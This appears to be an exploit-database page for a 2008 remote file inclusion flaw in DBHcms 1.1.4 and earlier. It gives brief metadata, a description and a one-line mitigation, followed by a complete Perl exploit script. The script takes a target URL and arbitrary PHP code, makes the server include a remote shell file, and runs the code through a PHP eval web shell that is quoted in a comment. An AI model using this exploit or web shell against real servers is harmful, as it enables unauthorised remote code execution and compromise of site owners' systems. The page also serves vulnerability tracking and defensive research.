header-logo
Suggest Exploit
vendor:
DBHcms
by:
Iron
7.5
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: DBHcms
Affected Version From: 1.1.2004
Affected Version To: 1.1.2004
Patch Exists: YES
Related CWE: N/A
CPE: a:drbenhur:dbhcms
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

DBHcms <= 1.1.4 Remote File Inclusion exploit

This exploit allows an attacker to execute arbitrary code on the vulnerable server by including a malicious file. The exploit is hard to execute through a browser, but possible. The exploit requires the attacker to send a POST request to the vulnerable server, containing the malicious file URL in the 'extmanager_install' parameter.

Mitigation:

Ensure that user-supplied input is properly validated and sanitized before being used in a file inclusion operation.
Source

Exploit-DB raw data:

#!/usr/bin/perl
#	DBHcms <= 1.1.4 Remote File Inclusion exploit
#	Vendor url: www.drbenhur.com
#
# exploit is hard to execute through a browser -possible though- since it's with POST
#							~Iron
#							http://www.randombase.com
require LWP::UserAgent;
#Shell:
# <?php if(!empty($_GET['do'])){eval($_GET['do']);}?>
$shell_url = "http://localhost/s.txt";

print "#
#  DBHcms <= 1.1.4 Remote File Inclusion exploit
# By Iron - randombase.com
# Greets to everyone at RootShell Security Group
#
# Example target url: http://www.target.com/dhbcms/
Target url?";
chomp($target=<stdin>);
if($target !~ /^http:\/\//)
{
	$target = "http://".$target;
}
if($target !~ /\/$/)
{
	$target .= "/";
}
print "PHP code to evaluate? ";
chomp($code=<stdin>);
$code =~ s/(<\?php|\?>|<\?)//ig;
$target .= "dbhcms/mod/mod.extmanager.php?do=".$code;

$ua = LWP::UserAgent->new;
$ua->timeout(10);
$ua->env_proxy;

$response = $ua->post($target,
{
'extmanager_install' => $shell_url.'?'
});

if ($response->is_success)
{
	print "\n"."#" x 20 ."\n";
	if($response->content =~ /URL file-access/)
	{
		print 'Exploit failed';
	}
	else
	{
		print $response->content;
	}
	print "\n"."#" x 20 ."\n";
}
else
{
 die "Error: ".$response->status_line;
}

# milw0rm.com [2008-02-25]

Navigation

Suggest Exploit

Services By CQR